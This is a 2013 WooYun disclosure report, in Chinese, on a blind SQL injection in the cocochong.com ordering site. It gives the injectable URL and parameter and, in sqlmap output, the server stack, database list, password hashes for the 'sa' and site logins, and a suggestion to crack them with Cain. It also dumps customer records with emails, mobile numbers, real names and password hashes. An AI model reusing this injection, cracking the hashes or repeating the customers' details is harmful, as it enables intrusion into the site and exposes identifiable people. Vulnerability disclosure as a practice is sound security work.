漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-040913
漏洞标题:壳壳虫sqlserver盲注导致用户数据泄露
相关厂商:壳壳虫订购台
漏洞作者: 迷雾
提交时间:2013-10-24 17:47
修复时间:2013-12-08 17:48
公开时间:2013-12-08 17:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-12-08: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
cocochong主站某页面sql盲注漏洞,泄露用户数据,dump数据库
详细说明:
1. 注入url:http://www.cocochong.com/ajax/ajax.aspx?str=1&type=getart2
注入ID: str
2. 使用sqlmap查看系统数据库
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [20]:
[*] back_newcoco
[*] coco_easy
[*] coco_easyliulan
[*] coco_liulan
[*] coco_ljl
[*] coco_meiti
[*] hkcocochong
[*] hzp_coco
[*] ludinggong
[*] master
[*] model
[*] msdb
[*] new_cocoljl
[*] noya
[*] qg
[*] temp_newcoco
[*] tempdb
[*] Test
[*] toupaicocochong
[*] zhileng
3. 扫描数据库当前用户和密码
database management system users password hashes:
[*] cocochongCYL [1]:
password hash: 0x01004a4661774b0b3214f68cf8c522ad728cad7b24a14275455c
header: 0x0100
salt: 4a466177
mixedcase: 4b0b3214f68cf8c522ad728cad7b24a14275455c
[*] sa [1]:
password hash: 0x01004086ceb6e37abf38663d2b696ba773e81546d404e321266c
header: 0x0100
salt: 4086ceb6
mixedcase: e37abf38663d2b696ba773e81546d404e321266c
将密码hash使用cain等工具进行破解
4. 显示数据库back_newcoco所有表
Database: back_newcoco
[11 tables]
+-----------------------+
| coco_centerprobyclass |
| coco_focusmap |
| coco_order |
| coco_orderitem |
| coco_paylog |
| coco_plan |
| coco_product |
| coco_productclass |
| coco_question |
| coco_remart |
| coco_user |
5. 查看表coco_user表结构
Database: back_newcoco
Table: coco_user
[23 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| address | nvarchar |
| answer | nvarchar |
| Balance | money |
| birthday | datetime |
| city | nvarchar |
| deliverdate | int |
| email | nvarchar |
| gender | bit |
| isreeze | bigint |
| LoginCount | int |
| mobile | nvarchar |
| paytype | int |
| question | nvarchar |
| realname | nvarchar |
| regtime | datetime |
| state | tinyint |
| tel | nvarchar |
| UserExp | int |
| UserExp2 | int |
| userid | int |
| username | nvarchar |
| userpassword | nvarchar |
| zipcode | nvarchar |
6. 抓取100名用户信息
Database: back_newcoco
Table: coco_user
[10 entries]
+---------------------+-------------+------------------+----------+----------------------------------+
| email | mobile | username | realname | userpassword |
+---------------------+-------------+------------------+----------+----------------------------------+
| [email protected] | 13671947811 | 13671947811 | <blank> | D8159D894C4FA54AF10E475F2AE1972E |
| <[email protected] | <blank> | xd夏丹 | <blank> | 402A7F59F21515E882EE3A99E7D5F183 |
| [email protected] | wewewewewe | ceshi04 | 111111 | 25F9E794323B453885F5181F1B624D0B |
| [email protected] | 13428968481 | 13428968481 | 黄晓敏 | 7AD3A320E79D70D802DD8376590D85ED |
| [email protected] | 13921209904 | 13921209904 | 钱丽娜 | FB138CFB652FF629DC2057362628BDCB |
| [email protected] | 13914700418 | 13914700418 | 陈明 | 870A6E0FC19379F8EE2C8C53D463D930 |
| [email protected] | <blank> | 1003778615 | <blank> | 0AFBB701F9445582EDA0AD065C4AF9BF |
| [email protected] | 13683027007 | 13683027007 | 安晓奕 | A66DA0F0840D7E6C3591AEA32439E4ED |
| [email protected] | 18012578306 | [email protected] | 杨辉 | BE676B6DE825F5F00249359E4AB69F9B |
| [email protected] | 18669259588 | vip | 林姗姗 | E10ADC3949BA59ABBE56E057F20F883E |
+---------------------+-------------+------------------+----------+----------------------------------+
漏洞证明:
已经证明
修复方案:
对用户的输入进行严格判断并过滤
对数据库的操作进行监控分析
版权声明:转载请注明来源 迷雾@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝